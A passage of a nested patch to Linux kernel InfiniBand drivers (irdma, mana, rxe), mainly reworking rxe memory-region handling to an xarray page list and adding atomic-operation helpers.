+ 		prot = pgprot_device(vma->vm_page_prot);
+ 		break;
+ 	default:
+-		return -EINVAL;
++		ret = -EINVAL;
++		goto out;
+ 	}
+ 
+ 	ret = rdma_user_mmap_io(uctx, vma, pfn, rdma_entry->npages * PAGE_SIZE,
+ 				prot, rdma_entry);
+ 
++out:
+ 	rdma_user_mmap_entry_put(rdma_entry);
+-
+ 	return ret;
+ }
+ 
+diff --git a/drivers/infiniband/hw/irdma/hw.c b/drivers/infiniband/hw/irdma/hw.c
+index ab246447520bd..2e1e2bad04011 100644
+--- a/drivers/infiniband/hw/irdma/hw.c
++++ b/drivers/infiniband/hw/irdma/hw.c
+@@ -483,6 +483,8 @@ static int irdma_save_msix_info(struct irdma_pci_f *rf)
+ 	iw_qvlist->num_vectors = rf->msix_count;
+ 	if (rf->msix_count <= num_online_cpus())
+ 		rf->msix_shared = true;
++	else if (rf->msix_count > num_online_cpus() + 1)
++		rf->msix_count = num_online_cpus() + 1;
+ 
+ 	pmsix = rf->msix_entries;
+ 	for (i = 0, ceq_idx = 0; i < rf->msix_count; i++, iw_qvinfo++) {
+diff --git a/drivers/infiniband/hw/mana/main.c b/drivers/infiniband/hw/mana/main.c
+index 8b3bc302d6f3a..7be4c3adb4e2b 100644
+--- a/drivers/infiniband/hw/mana/main.c
++++ b/drivers/infiniband/hw/mana/main.c
+@@ -249,7 +249,8 @@ static int
+ mana_ib_gd_first_dma_region(struct mana_ib_dev *dev,
+ 			    struct gdma_context *gc,
+ 			    struct gdma_create_dma_region_req *create_req,
+-			    size_t num_pages, mana_handle_t *gdma_region)
++			    size_t num_pages, mana_handle_t *gdma_region,
++			    u32 expected_status)
+ {
+ 	struct gdma_create_dma_region_resp create_resp = {};
+ 	unsigned int create_req_msg_size;
+@@ -261,7 +262,7 @@ mana_ib_gd_first_dma_region(struct mana_ib_dev *dev,
+ 
+ 	err = mana_gd_send_request(gc, create_req_msg_size, create_req,
+ 				   sizeof(create_resp), &create_resp);
+-	if (err || create_resp.hdr.status) {
++	if (err || create_resp.hdr.status != expected_status) {
+ 		ibdev_dbg(&dev->ib_dev,
+ 			  "Failed to create DMA region: %d, 0x%x\n",
+ 			  err, create_resp.hdr.status);
+@@ -372,14 +373,21 @@ int mana_ib_gd_create_dma_region(struct mana_ib_dev *dev, struct ib_umem *umem,
+ 
+ 	page_addr_list = create_req->page_addr_list;
+ 	rdma_umem_for_each_dma_block(umem, &biter, page_sz) {
++		u32 expected_status = 0;
++
+ 		page_addr_list[tail++] = rdma_block_iter_dma_address(&biter);
+ 		if (tail < num_pages_to_handle)
+ 			continue;
+ 
++		if (num_pages_processed + num_pages_to_handle <
++		    num_pages_total)
++			expected_status = GDMA_STATUS_MORE_ENTRIES;
++
+ 		if (!num_pages_processed) {
+ 			/* First create message */
+ 			err = mana_ib_gd_first_dma_region(dev, gc, create_req,
+-							  tail, gdma_region);
++							  tail, gdma_region,
++							  expected_status);
+ 			if (err)
+ 				goto out;
+ 
+@@ -392,14 +400,8 @@ int mana_ib_gd_create_dma_region(struct mana_ib_dev *dev, struct ib_umem *umem,
+ 			page_addr_list = add_req->page_addr_list;
+ 		} else {
+ 			/* Subsequent create messages */
+-			u32 expected_s = 0;
+-
+-			if (num_pages_processed + num_pages_to_handle <
+-			    num_pages_total)
+-				expected_s = GDMA_STATUS_MORE_ENTRIES;
+-
+ 			err = mana_ib_gd_add_dma_region(dev, gc, add_req, tail,
+-							expected_s);
++							expected_status);
+ 			if (err)
+ 				break;
+ 		}
+diff --git a/drivers/infiniband/sw/rxe/rxe.h b/drivers/infiniband/sw/rxe/rxe.h
+index ab334900fcc3d..2415f3704f576 100644
+--- a/drivers/infiniband/sw/rxe/rxe.h
++++ b/drivers/infiniband/sw/rxe/rxe.h
+@@ -57,6 +57,44 @@
+ #define rxe_dbg_mw(mw, fmt, ...) ibdev_dbg((mw)->ibmw.device,		\
+ 		"mw#%d %s:  " fmt, (mw)->elem.index, __func__, ##__VA_ARGS__)
+ 
++/* responder states */
++enum resp_states {
++	RESPST_NONE,
++	RESPST_GET_REQ,
++	RESPST_CHK_PSN,
++	RESPST_CHK_OP_SEQ,
++	RESPST_CHK_OP_VALID,
++	RESPST_CHK_RESOURCE,
++	RESPST_CHK_LENGTH,
++	RESPST_CHK_RKEY,
++	RESPST_EXECUTE,
++	RESPST_READ_REPLY,
++	RESPST_ATOMIC_REPLY,
++	RESPST_ATOMIC_WRITE_REPLY,
++	RESPST_PROCESS_FLUSH,
++	RESPST_COMPLETE,
++	RESPST_ACKNOWLEDGE,
++	RESPST_CLEANUP,
++	RESPST_DUPLICATE_REQUEST,
++	RESPST_ERR_MALFORMED_WQE,
++	RESPST_ERR_UNSUPPORTED_OPCODE,
++	RESPST_ERR_MISALIGNED_ATOMIC,
++	RESPST_ERR_PSN_OUT_OF_SEQ,
++	RESPST_ERR_MISSING_OPCODE_FIRST,
++	RESPST_ERR_MISSING_OPCODE_LAST_C,
++	RESPST_ERR_MISSING_OPCODE_LAST_D1E,
++	RESPST_ERR_TOO_MANY_RDMA_ATM_REQ,
++	RESPST_ERR_RNR,
++	RESPST_ERR_RKEY_VIOLATION,
++	RESPST_ERR_INVALIDATE_RKEY,
++	RESPST_ERR_LENGTH,
++	RESPST_ERR_CQ_OVERFLOW,
++	RESPST_ERROR,
++	RESPST_RESET,
++	RESPST_DONE,
++	RESPST_EXIT,
++};
++
+ void rxe_set_mtu(struct rxe_dev *rxe, unsigned int dev_mtu);
+ 
+ int rxe_add(struct rxe_dev *rxe, unsigned int mtu, const char *ibdev_name);
+diff --git a/drivers/infiniband/sw/rxe/rxe_loc.h b/drivers/infiniband/sw/rxe/rxe_loc.h
+index 948ce4902b10f..1bb0cb479eb12 100644
+--- a/drivers/infiniband/sw/rxe/rxe_loc.h
++++ b/drivers/infiniband/sw/rxe/rxe_loc.h
+@@ -64,12 +64,16 @@ void rxe_mr_init_dma(int access, struct rxe_mr *mr);
+ int rxe_mr_init_user(struct rxe_dev *rxe, u64 start, u64 length, u64 iova,
+ 		     int access, struct rxe_mr *mr);
+ int rxe_mr_init_fast(int max_pages, struct rxe_mr *mr);
+-int rxe_flush_pmem_iova(struct rxe_mr *mr, u64 iova, int length);
+-int rxe_mr_copy(struct rxe_mr *mr, u64 iova, void *addr, int length,
+-		enum rxe_mr_copy_dir dir);
++int rxe_flush_pmem_iova(struct rxe_mr *mr, u64 iova, unsigned int length);
++int rxe_mr_copy(struct rxe_mr *mr, u64 iova, void *addr,
++		unsigned int length, enum rxe_mr_copy_dir dir);
+ int copy_data(struct rxe_pd *pd, int access, struct rxe_dma_info *dma,
+ 	      void *addr, int length, enum rxe_mr_copy_dir dir);
+-void *iova_to_vaddr(struct rxe_mr *mr, u64 iova, int length);
++int rxe_map_mr_sg(struct ib_mr *ibmr, struct scatterlist *sg,
++		  int sg_nents, unsigned int *sg_offset);
++int rxe_mr_do_atomic_op(struct rxe_mr *mr, u64 iova, int opcode,
++			u64 compare, u64 swap_add, u64 *orig_val);
++int rxe_mr_do_atomic_write(struct rxe_mr *mr, u64 iova, u64 value);
+ struct rxe_mr *lookup_mr(struct rxe_pd *pd, int access, u32 key,
+ 			 enum rxe_mr_lookup_type type);
+ int mr_check_range(struct rxe_mr *mr, u64 iova, size_t length);
+diff --git a/drivers/infiniband/sw/rxe/rxe_mr.c b/drivers/infiniband/sw/rxe/rxe_mr.c
+index 072eac4b65d29..5e9a03831bf9f 100644
+--- a/drivers/infiniband/sw/rxe/rxe_mr.c
++++ b/drivers/infiniband/sw/rxe/rxe_mr.c
+@@ -26,22 +26,22 @@ u8 rxe_get_next_key(u32 last_key)
+ 
+ int mr_check_range(struct rxe_mr *mr, u64 iova, size_t length)
+ {
+-
+-
+ 	switch (mr->ibmr.type) {
+ 	case IB_MR_TYPE_DMA:
+ 		return 0;
+ 
+ 	case IB_MR_TYPE_USER:
+ 	case IB_MR_TYPE_MEM_REG:
+-		if (iova < mr->ibmr.iova || length > mr->ibmr.length ||
+-		    iova > mr->ibmr.iova + mr->ibmr.length - length)
+-			return -EFAULT;
++		if (iova < mr->ibmr.iova ||
++		    iova + length > mr->ibmr.iova + mr->ibmr.length) {
++			rxe_dbg_mr(mr, "iova/length out of range");
++			return -EINVAL;
++		}
+ 		return 0;
+ 
+ 	default:
+-		rxe_dbg_mr(mr, "type (%d) not supported\n", mr->ibmr.type);
+-		return -EFAULT;
++		rxe_dbg_mr(mr, "mr type not supported\n");
++		return -EINVAL;
+ 	}
+ }
+ 
+@@ -62,57 +62,31 @@ static void rxe_mr_init(int access, struct rxe_mr *mr)
+ 	mr->lkey = mr->ibmr.lkey = lkey;
+ 	mr->rkey = mr->ibmr.rkey = rkey;
+ 
++	mr->access = access;
++	mr->ibmr.page_size = PAGE_SIZE;
++	mr->page_mask = PAGE_MASK;
++	mr->page_shift = PAGE_SHIFT;
+ 	mr->state = RXE_MR_STATE_INVALID;
+ }
+ 
+-static int rxe_mr_alloc(struct rxe_mr *mr, int num_buf)
+-{
+-	int i;
+-	int num_map;
+-	struct rxe_map **map = mr->map;
+-
+-	num_map = (num_buf + RXE_BUF_PER_MAP - 1) / RXE_BUF_PER_MAP;
+-
+-	mr->map = kmalloc_array(num_map, sizeof(*map), GFP_KERNEL);
+-	if (!mr->map)
+-		goto err1;
+-
+-	for (i = 0; i < num_map; i++) {
+-		mr->map[i] = kmalloc(sizeof(**map), GFP_KERNEL);
+-		if (!mr->map[i])
+-			goto err2;
+-	}
+-
+-	BUILD_BUG_ON(!is_power_of_2(RXE_BUF_PER_MAP));
+-
+-	mr->map_shift = ilog2(RXE_BUF_PER_MAP);
+-	mr->map_mask = RXE_BUF_PER_MAP - 1;
+-
+-	mr->num_buf = num_buf;
+-	mr->num_map = num_map;
+-	mr->max_buf = num_map * RXE_BUF_PER_MAP;
+-
+-	return 0;
+-
+-err2:
+-	for (i--; i >= 0; i--)
+-		kfree(mr->map[i]);
+-
+-	kfree(mr->map);
+-	mr->map = NULL;
+-err1:
+-	return -ENOMEM;
+-}
+-
+ void rxe_mr_init_dma(int access, struct rxe_mr *mr)
+ {
+ 	rxe_mr_init(access, mr);
+ 
+-	mr->access = access;
+ 	mr->state = RXE_MR_STATE_VALID;
+ 	mr->ibmr.type = IB_MR_TYPE_DMA;
+ }
+ 
++static unsigned long rxe_mr_iova_to_index(struct rxe_mr *mr, u64 iova)
++{
++	return (iova >> mr->page_shift) - (mr->ibmr.iova >> mr->page_shift);
++}
++
++static unsigned long rxe_mr_iova_to_page_offset(struct rxe_mr *mr, u64 iova)
++{
++	return iova & (mr_page_size(mr) - 1);
++}
++
+ static bool is_pmem_page(struct page *pg)
+ {
+ 	unsigned long paddr = page_to_phys(pg);
+@@ -122,86 +96,98 @@ static bool is_pmem_page(struct page *pg)
+ 				 IORES_DESC_PERSISTENT_MEMORY);
+ }
+ 
++static int rxe_mr_fill_pages_from_sgt(struct rxe_mr *mr, struct sg_table *sgt)
++{
++	XA_STATE(xas, &mr->page_list, 0);
++	struct sg_page_iter sg_iter;
++	struct page *page;
++	bool persistent = !!(mr->access & IB_ACCESS_FLUSH_PERSISTENT);
++
++	__sg_page_iter_start(&sg_iter, sgt->sgl, sgt->orig_nents, 0);
++	if (!__sg_page_iter_next(&sg_iter))
++		return 0;
++
++	do {
++		xas_lock(&xas);
++		while (true) {
++			page = sg_page_iter_page(&sg_iter);
++
++			if (persistent && !is_pmem_page(page)) {
++				rxe_dbg_mr(mr, "Page can't be persistent\n");
++				xas_set_err(&xas, -EINVAL);
++				break;
++			}
++
++			xas_store(&xas, page);
++			if (xas_error(&xas))
++				break;
++			xas_next(&xas);
++			if (!__sg_page_iter_next(&sg_iter))
++				break;
++		}
++		xas_unlock(&xas);
++	} while (xas_nomem(&xas, GFP_KERNEL));
++
++	return xas_error(&xas);
++}
++
+ int rxe_mr_init_user(struct rxe_dev *rxe, u64 start, u64 length, u64 iova,
+ 		     int access, struct rxe_mr *mr)
+ {
+-	struct rxe_map		**map;
+-	struct rxe_phys_buf	*buf = NULL;
+-	struct ib_umem		*umem;
+-	struct sg_page_iter	sg_iter;
+-	int			num_buf;
+-	void			*vaddr;
++	struct ib_umem *umem;
+ 	int err;
+ 
++	rxe_mr_init(access, mr);
++
++	xa_init(&mr->page_list);
++
+ 	umem = ib_umem_get(&rxe->ib_dev, start, length, access);
+ 	if (IS_ERR(umem)) {
+ 		rxe_dbg_mr(mr, "Unable to pin memory region err = %d\n",
+ 			(int)PTR_ERR(umem));
+-		err = PTR_ERR(umem);
+-		goto err_out;
++		return PTR_ERR(umem);
+ 	}
+ 
+-	num_buf = ib_umem_num_pages(umem);
+-
+-	rxe_mr_init(access, mr);
+-
+-	err = rxe_mr_alloc(mr, num_buf);
++	err = rxe_mr_fill_pages_from_sgt(mr, &umem->sgt_append.sgt);
+ 	if (err) {
+-		rxe_dbg_mr(mr, "Unable to allocate memory for map\n");
+-		goto err_release_umem;
++		ib_umem_release(umem);
++		return err;
+ 	}
+ 
+-	mr->page_shift = PAGE_SHIFT;
+-	mr->page_mask = PAGE_SIZE - 1;
+-
+-	num_buf			= 0;
+-	map = mr->map;
+-	if (length > 0) {
+-		bool persistent_access = access & IB_ACCESS_FLUSH_PERSISTENT;
+-
+-		buf = map[0]->buf;
+-		for_each_sgtable_page (&umem->sgt_append.sgt, &sg_iter, 0) {
+-			struct page *pg = sg_page_iter_page(&sg_iter);
++	mr->umem = umem;
++	mr->ibmr.type = IB_MR_TYPE_USER;
++	mr->state = RXE_MR_STATE_VALID;
+ 
+-			if (persistent_access && !is_pmem_page(pg)) {
+-				rxe_dbg_mr(mr, "Unable to register persistent access to non-pmem device\n");
+-				err = -EINVAL;
+-				goto err_release_umem;
+-			}
++	return 0;
++}
+ 
+-			if (num_buf >= RXE_BUF_PER_MAP) {
+-				map++;
+-				buf = map[0]->buf;
+-				num_buf = 0;
+-			}
++static int rxe_mr_alloc(struct rxe_mr *mr, int num_buf)
++{
++	XA_STATE(xas, &mr->page_list, 0);
++	int i = 0;
++	int err;
+ 
+-			vaddr = page_address(pg);
+-			if (!vaddr) {
+-				rxe_dbg_mr(mr, "Unable to get virtual address\n");
+-				err = -ENOMEM;
+-				goto err_release_umem;
+-			}
+-			buf->addr = (uintptr_t)vaddr;
+-			buf->size = PAGE_SIZE;
+-			num_buf++;
+-			buf++;
++	xa_init(&mr->page_list);
+ 
++	do {
++		xas_lock(&xas);
++		while (i != num_buf) {
++			xas_store(&xas, XA_ZERO_ENTRY);
++			if (xas_error(&xas))
++				break;
++			xas_next(&xas);
++			i++;
+ 		}
+-	}
++		xas_unlock(&xas);
++	} while (xas_nomem(&xas, GFP_KERNEL));
+ 
+-	mr->umem = umem;
+-	mr->access = access;
+-	mr->offset = ib_umem_offset(umem);
+-	mr->state = RXE_MR_STATE_VALID;
+-	mr->ibmr.type = IB_MR_TYPE_USER;
+-	mr->ibmr.page_size = PAGE_SIZE;
++	err = xas_error(&xas);
++	if (err)
++		return err;
+ 
+-	return 0;
++	mr->num_buf = num_buf;
+ 
+-err_release_umem:
+-	ib_umem_release(umem);
+-err_out:
+-	return err;
++	return 0;
+ }
+ 
+ int rxe_mr_init_fast(int max_pages, struct rxe_mr *mr)
+@@ -215,7 +201,6 @@ int rxe_mr_init_fast(int max_pages, struct rxe_mr *mr)
+ 	if (err)
+ 		goto err1;
+ 
+-	mr->max_buf = max_pages;
+ 	mr->state = RXE_MR_STATE_FREE;
+ 	mr->ibmr.type = IB_MR_TYPE_MEM_REG;
+ 
+@@ -225,187 +210,125 @@ err1:
+ 	return err;
+ }
+ 
+-static void lookup_iova(struct rxe_mr *mr, u64 iova, int *m_out, int *n_out,
+-			size_t *offset_out)
++static int rxe_set_page(struct ib_mr *ibmr, u64 iova)
+ {
+-	size_t offset = iova - mr->ibmr.iova + mr->offset;
+-	int			map_index;
+-	int			buf_index;
+-	u64			length;
+-
+-	if (likely(mr->page_shift)) {
+-		*offset_out = offset & mr->page_mask;
+-		offset >>= mr->page_shift;
+-		*n_out = offset & mr->map_mask;
+-		*m_out = offset >> mr->map_shift;
+-	} else {
+-		map_index = 0;
+-		buf_index = 0;
++	struct rxe_mr *mr = to_rmr(ibmr);
++	struct page *page = virt_to_page(iova & mr->page_mask);
++	bool persistent = !!(mr->access & IB_ACCESS_FLUSH_PERSISTENT);
++	int err;
+ 
+-		length = mr->map[map_index]->buf[buf_index].size;
++	if (persistent && !is_pmem_page(page)) {
++		rxe_dbg_mr(mr, "Page cannot be persistent\n");
++		return -EINVAL;
++	}
+ 
+-		while (offset >= length) {
+-			offset -= length;
+-			buf_index++;
++	if (unlikely(mr->nbuf == mr->num_buf))
++		return -ENOMEM;
+ 
+-			if (buf_index == RXE_BUF_PER_MAP) {
+-				map_index++;
+-				buf_index = 0;
+-			}
+-			length = mr->map[map_index]->buf[buf_index].size;
+-		}
++	err = xa_err(xa_store(&mr->page_list, mr->nbuf, page, GFP_KERNEL));
++	if (err)
++		return err;
+ 
+-		*m_out = map_index;
+-		*n_out = buf_index;
+-		*offset_out = offset;
+-	}
++	mr->nbuf++;
++	return 0;
+ }
+ 
+-void *iova_to_vaddr(struct rxe_mr *mr, u64 iova, int length)
++int rxe_map_mr_sg(struct ib_mr *ibmr, struct scatterlist *sgl,
++		  int sg_nents, unsigned int *sg_offset)
+ {
+-	size_t offset;
+-	int m, n;
+-	void *addr;
+-
+-	if (mr->state != RXE_MR_STATE_VALID) {
+-		rxe_dbg_mr(mr, "Not in valid state\n");
+-		addr = NULL;
+-		goto out;
+-	}
+-
+-	if (!mr->map) {
+-		addr = (void *)(uintptr_t)iova;
+-		goto out;
+-	}
+-
+-	if (mr_check_range(mr, iova, length)) {
+-		rxe_dbg_mr(mr, "Range violation\n");
+-		addr = NULL;
+-		goto out;
+-	}
+-
+-	lookup_iova(mr, iova, &m, &n, &offset);
+-
+-	if (offset + length > mr->map[m]->buf[n].size) {
+-		rxe_dbg_mr(mr, "Crosses page boundary\n");
+-		addr = NULL;
+-		goto out;
+-	}
++	struct rxe_mr *mr = to_rmr(ibmr);
++	unsigned int page_size = mr_page_size(mr);
+ 
+-	addr = (void *)(uintptr_t)mr->map[m]->buf[n].addr + offset;
++	mr->nbuf = 0;
++	mr->page_shift = ilog2(page_size);
++	mr->page_mask = ~((u64)page_size - 1);
++	mr->page_offset = mr->ibmr.iova & (page_size - 1);
+ 
+-out:
+-	return addr;
++	return ib_sg_to_pages(ibmr, sgl, sg_nents, sg_offset, rxe_set_page);
+ }
+ 
+-int rxe_flush_pmem_iova(struct rxe_mr *mr, u64 iova, int length)
++static int rxe_mr_copy_xarray(struct rxe_mr *mr, u64 iova, void *addr,
++			      unsigned int length, enum rxe_mr_copy_dir dir)
+ {
+-	size_t offset;
++	unsigned int page_offset = rxe_mr_iova_to_page_offset(mr, iova);
++	unsigned long index = rxe_mr_iova_to_index(mr, iova);
++	unsigned int bytes;
++	struct page *page;
++	void *va;
+ 
+-	if (length == 0)
+-		return 0;
+-
+-	if (mr->ibmr.type == IB_MR_TYPE_DMA)
+-		return -EFAULT;
+-
+-	offset = (iova - mr->ibmr.iova + mr->offset) & mr->page_mask;
+-	while (length > 0) {
+-		u8 *va;
+-		int bytes;
+-
+-		bytes = mr->ibmr.page_size - offset;
+-		if (bytes > length)
+-			bytes = length;
+-
+-		va = iova_to_vaddr(mr, iova, length);
+-		if (!va)
++	while (length) {
++		page = xa_load(&mr->page_list, index);
++		if (!page)
+ 			return -EFAULT;
+ 
+-		arch_wb_cache_pmem(va, bytes);
+-
++		bytes = min_t(unsigned int, length,
++				mr_page_size(mr) - page_offset);
++		va = kmap_local_page(page);
++		if (dir == RXE_FROM_MR_OBJ)
++			memcpy(addr, va + page_offset, bytes);
++		else
++			memcpy(va + page_offset, addr, bytes);
++		kunmap_local(va);
++
++		page_offset = 0;
++		addr += bytes;
+ 		length -= bytes;
+-		iova += bytes;
+-		offset = 0;
++		index++;
+ 	}
+ 
+ 	return 0;
+ }
+ 
+-/* copy data from a range (vaddr, vaddr+length-1) to or from
+- * a mr object starting at iova.
+- */
+-int rxe_mr_copy(struct rxe_mr *mr, u64 iova, void *addr, int length,
+-		enum rxe_mr_copy_dir dir)
++static void rxe_mr_copy_dma(struct rxe_mr *mr, u64 iova, void *addr,
++			    unsigned int length, enum rxe_mr_copy_dir dir)
+ {
+-	int			err;
+-	int			bytes;
+-	u8			*va;
+-	struct rxe_map		**map;
+-	struct rxe_phys_buf	*buf;
+-	int			m;
+-	int			i;
+-	size_t			offset;
+-
+-	if (length == 0)
+-		return 0;
++	unsigned int page_offset = iova & (PAGE_SIZE - 1);
++	unsigned int bytes;
++	struct page *page;
++	u8 *va;
+ 
+-	if (mr->ibmr.type == IB_MR_TYPE_DMA) {
+-		u8 *src, *dest;
++	while (length) {
++		page = virt_to_page(iova & mr->page_mask);
++		bytes = min_t(unsigned int, length,
++				PAGE_SIZE - page_offset);
++		va = kmap_local_page(page);
++
++		if (dir == RXE_TO_MR_OBJ)
++			memcpy(va + page_offset, addr, bytes);
++		else
++			memcpy(addr, va + page_offset, bytes);
++
++		kunmap_local(va);
++		page_offset = 0;
++		iova += bytes;
++		addr += bytes;
++		length -= bytes;
++	}
++}
+ 
+-		src = (dir == RXE_TO_MR_OBJ) ? addr : ((void *)(uintptr_t)iova);
++int rxe_mr_copy(struct rxe_mr *mr, u64 iova, void *addr,
++		unsigned int length, enum rxe_mr_copy_dir dir)
++{
++	int err;
+ 
+-		dest = (dir == RXE_TO_MR_OBJ) ? ((void *)(uintptr_t)iova) : addr;
++	if (length == 0)
++		return 0;
+ 
+-		memcpy(dest, src, length);
++	if (WARN_ON(!mr))
++		return -EINVAL;
+ 
++	if (mr->ibmr.type == IB_MR_TYPE_DMA) {
++		rxe_mr_copy_dma(mr, iova, addr, length, dir);
+ 		return 0;
+ 	}
+ 
+-	WARN_ON_ONCE(!mr->map);
+-
+ 	err = mr_check_range(mr, iova, length);
+-	if (err) {
+-		err = -EFAULT;
+-		goto err1;
+-	}
+-
+-	lookup_iova(mr, iova, &m, &i, &offset);
+-
+-	map = mr->map + m;
+-	buf	= map[0]->buf + i;
+-
+-	while (length > 0) {
+-		u8 *src, *dest;
+-
+-		va	= (u8 *)(uintptr_t)buf->addr + offset;
+-		src = (dir == RXE_TO_MR_OBJ) ? addr : va;
+-		dest = (dir == RXE_TO_MR_OBJ) ? va : addr;
+-
+-		bytes	= buf->size - offset;
+-
+-		if (bytes > length)
+-			bytes = length;
+-
+-		memcpy(dest, src, bytes);
+-
+-		length	-= bytes;
+-		addr	+= bytes;
+-
+-		offset	= 0;
+-		buf++;
+-		i++;
+-
+-		if (i == RXE_BUF_PER_MAP) {
+-			i = 0;
+-			map++;
+-			buf = map[0]->buf;
+-		}
++	if (unlikely(err)) {
++		rxe_dbg_mr(mr, "iova out of range");
++		return err;
+ 	}
+ 
+-	return 0;
+-
+-err1:
+-	return err;
++	return rxe_mr_copy_xarray(mr, iova, addr, length, dir);
+ }
+ 
+ /* copy data in or out of a wqe, i.e. sg list
+@@ -477,7 +400,6 @@ int copy_data(
+ 
+ 		if (bytes > 0) {
+ 			iova = sge->addr + offset;
+-
+ 			err = rxe_mr_copy(mr, iova, addr, bytes, dir);
+ 			if (err)
+ 				goto err2;
+@@ -504,6 +426,165 @@ err1:
+ 	return err;
+ }
+ 
++int rxe_flush_pmem_iova(struct rxe_mr *mr, u64 iova, unsigned int length)
++{
++	unsigned int page_offset;
++	unsigned long index;
++	struct page *page;
++	unsigned int bytes;
++	int err;
++	u8 *va;
++
++	/* mr must be valid even if length is zero */
++	if (WARN_ON(!mr))
++		return -EINVAL;
++
++	if (length == 0)
++		return 0;
++
++	if (mr->ibmr.type == IB_MR_TYPE_DMA)
++		return -EFAULT;
++
++	err = mr_check_range(mr, iova, length);
++	if (err)
++		return err;
++
++	while (length > 0) {
++		index = rxe_mr_iova_to_index(mr, iova);
++		page = xa_load(&mr->page_list, index);
++		page_offset = rxe_mr_iova_to_page_offset(mr, iova);
++		if (!page)
++			return -EFAULT;
++		bytes = min_t(unsigned int, length,
++				mr_page_size(mr) - page_offset);
++
++		va = kmap_local_page(page);
++		arch_wb_cache_pmem(va + page_offset, bytes);
++		kunmap_local(va);
++
++		length -= bytes;
++		iova += bytes;
++		page_offset = 0;
++	}
++
++	return 0;
++}
++
++/* Guarantee atomicity of atomic operations at the machine level. */
++static DEFINE_SPINLOCK(atomic_ops_lock);
++
++int rxe_mr_do_atomic_op(struct rxe_mr *mr, u64 iova, int opcode,
++			u64 compare, u64 swap_add, u64 *orig_val)
++{
++	unsigned int page_offset;
++	struct page *page;
++	u64 value;
++	u64 *va;
++
++	if (unlikely(mr->state != RXE_MR_STATE_VALID)) {
++		rxe_dbg_mr(mr, "mr not in valid state");
++		return RESPST_ERR_RKEY_VIOLATION;
++	}
++
++	if (mr->ibmr.type == IB_MR_TYPE_DMA) {
++		page_offset = iova & (PAGE_SIZE - 1);
++		page = virt_to_page(iova & PAGE_MASK);
++	} else {
++		unsigned long index;
++		int err;
++
++		err = mr_check_range(mr, iova, sizeof(value));
++		if (err) {
++			rxe_dbg_mr(mr, "iova out of range");
++			return RESPST_ERR_RKEY_VIOLATION;
++		}
++		page_offset = rxe_mr_iova_to_page_offset(mr, iova);
++		index = rxe_mr_iova_to_index(mr, iova);
++		page = xa_load(&mr->page_list, index);
++		if (!page)
++			return RESPST_ERR_RKEY_VIOLATION;
++	}
++
++	if (unlikely(page_offset & 0x7)) {
++		rxe_dbg_mr(mr, "iova not aligned");
++		return RESPST_ERR_MISALIGNED_ATOMIC;
++	}
++
++	va = kmap_local_page(page);
++
++	spin_lock_bh(&atomic_ops_lock);
++	value = *orig_val = va[page_offset >> 3];
++
++	if (opcode == IB_OPCODE_RC_COMPARE_SWAP) {
++		if (value == compare)
++			va[page_offset >> 3] = swap_add;
++	} else {
++		value += swap_add;
++		va[page_offset >> 3] = value;
++	}
++	spin_unlock_bh(&atomic_ops_lock);
++
++	kunmap_local(va);
++
++	return 0;
++}
++
++#if defined CONFIG_64BIT
++/* only implemented or called for 64 bit architectures */
++int rxe_mr_do_atomic_write(struct rxe_mr *mr, u64 iova, u64 value)
++{
++	unsigned int page_offset;
++	struct page *page;
++	u64 *va;
++
++	/* See IBA oA19-28 */
++	if (unlikely(mr->state != RXE_MR_STATE_VALID)) {
++		rxe_dbg_mr(mr, "mr not in valid state");
++		return RESPST_ERR_RKEY_VIOLATION;
++	}
++
++	if (mr->ibmr.type == IB_MR_TYPE_DMA) {
++		page_offset = iova & (PAGE_SIZE - 1);
++		page = virt_to_page(iova & PAGE_MASK);
++	} else {
++		unsigned long index;
++		int err;
++
++		/* See IBA oA19-28 */
++		err = mr_check_range(mr, iova, sizeof(value));
++		if (unlikely(err)) {
++			rxe_dbg_mr(mr, "iova out of range");
++			return RESPST_ERR_RKEY_VIOLATION;
++		}
++		page_offset = rxe_mr_iova_to_page_offset(mr, iova);
++		index = rxe_mr_iova_to_index(mr, iova);
++		page = xa_load(&mr->page_list, index);
++		if (!page)
++			return RESPST_ERR_RKEY_VIOLATION;
++	}
++
++	/* See IBA A19.4.2 */
++	if (unlikely(page_offset & 0x7)) {
++		rxe_dbg_mr(mr, "misaligned address");
++		return RESPST_ERR_MISALIGNED_ATOMIC;
++	}
++
++	va = kmap_local_page(page);
++
++	/* Do atomic write after all prior operations have completed */
++	smp_store_release(&va[page_offset >> 3], value);
++
++	kunmap_local(va);
++
++	return 0;
++}
++#else
++int rxe_mr_do_atomic_write(struct rxe_mr *mr, u64 iova, u64 value)
++{
++	return RESPST_ERR_UNSUPPORTED_OPCODE;
++}
++#endif
++
+ int advance_dma_data(struct rxe_dma_info *dma, unsigned int length)
+ {
+ 	struct rxe_sge		*sge	= &dma->sge[dma->cur_sge];
+@@ -537,12 +618,6 @@ int advance_dma_data(struct rxe_dma_info *dma, unsigned int length)
+ 	return 0;
+ }
+ 
+-/* (1) find the mr corresponding to lkey/rkey
+- *     depending on lookup_type
+- * (2) verify that the (qp) pd matches the mr pd
+- * (3) verify that the mr can support the requested access
+- * (4) verify that mr state is valid
+- */
+ struct rxe_mr *lookup_mr(struct rxe_pd *pd, int access, u32 key,
+ 			 enum rxe_mr_lookup_type type)
+ {
+@@ -663,15 +738,10 @@ int rxe_dereg_mr(struct ib_mr *ibmr, struct ib_udata *udata)
+ void rxe_mr_cleanup(struct rxe_pool_elem *elem)
+ {
+ 	struct rxe_mr *mr = container_of(elem, typeof(*mr), elem);
+-	int i;
+ 
+ 	rxe_put(mr_pd(mr));
+ 	ib_umem_release(mr->umem);
+ 
+-	if (mr->map) {
+-		for (i = 0; i < mr->num_map; i++)
+-			kfree(mr->map[i]);
+-
+-		kfree(mr->map);
+-	}
++	if (mr->ibmr.type != IB_MR_TYPE_DMA)
++		xa_destroy(&mr->page_list);
+ }
+diff --git a/drivers/infiniband/sw/rxe/rxe_queue.h b/drivers/infiniband/sw/rxe/rxe_queue.h
+index ed44042782fa7..c711cb98b9496 100644
+--- a/drivers/infiniband/sw/rxe/rxe_queue.h
++++ b/drivers/infiniband/sw/rxe/rxe_queue.h
+@@ -35,19 +35,26 @@
+ /**
+  * enum queue_type - type of queue
+  * @QUEUE_TYPE_TO_CLIENT:	Queue is written by rxe driver and
+- *				read by client. Used by rxe driver only.
++ *				read by client which may be a user space
++ *				application or a kernel ulp.
++ *				Used by rxe internals only.
+  * @QUEUE_TYPE_FROM_CLIENT:	Queue is written by client and
+- *				read by rxe driver. Used by rxe driver only.
+- * @QUEUE_TYPE_TO_DRIVER:	Queue is written by client and
+- *				read by rxe driver. Used by kernel client only.
+- * @QUEUE_TYPE_FROM_DRIVER:	Queue is written by rxe driver and
